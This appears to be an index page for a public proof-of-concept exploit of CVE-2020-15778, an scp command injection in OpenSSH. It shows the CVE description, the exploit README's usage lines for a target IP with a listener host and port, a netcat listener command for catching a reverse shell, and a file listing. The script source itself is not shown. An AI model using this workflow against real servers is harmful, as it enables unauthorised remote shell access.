CVE-2020-15778 PoC — OpenSSH OS Command Injection Vulnerability

Source
Associated Vulnerability
Title: OpenSSH OS Command Injection Vulnerability (CVE-2020-15778)
Description: scp in OpenSSH through 8.3p1 allows command injection in the scp.c toremote function, as demonstrated by backtick characters in the destination argument. NOTE: the vendor reportedly has stated that they intentionally omit validation of "anomalous argument transfers" because that could "stand a great chance of breaking existing workflows."
Description
Exploit for CVE-2020-15778 (OpenSSH vulnerability)
Readme
# CVE-2020-15778-Exploit
## Exploit for CVE-2020-15778 (OpenSSH vulnerability)  
Example: `python CVE-2020-15778.py -ip 192.168.11.123 -lhost 192.168.11.124 -lport 1234`  
Before running the Python script, start a netcat listener on the port.  
Example: `nc -lvp 1234`  
1. Screenshot of the script in use  
![Alt text](https://github.com/yukiNeko114514/CVE-2020-15778-Exploit/blob/main/img/1.PNG)  
2. Screenshot of the resulting shell  
![Alt text](https://github.com/yukiNeko114514/CVE-2020-15778-Exploit/blob/main/img/2.PNG)  
  
 2021-7-21 Update Log:  
 Uses python-nmap to check host status  
 Usage: `python3 CVE-2020-15778-Update.py -ip 192.168.11.123 -lhost 192.168.11.124 -lport 1234`  
 Run `pip3 install python-nmap` before using the updated script  
 XD
File Snapshot

[4.0K] /data/pocs/9f77b4717f9d9917ba826ad9aa8af63b4514c8fb
├── [1.6K] CVE-2020-15778.py
├── [2.0K] CVE-2020-15778-Update.py
├── [4.0K] img
│   ├── [ 62K] 1.PNG
│   └── [ 15K] 2.PNG
└── [ 725] README.md

1 directory, 5 files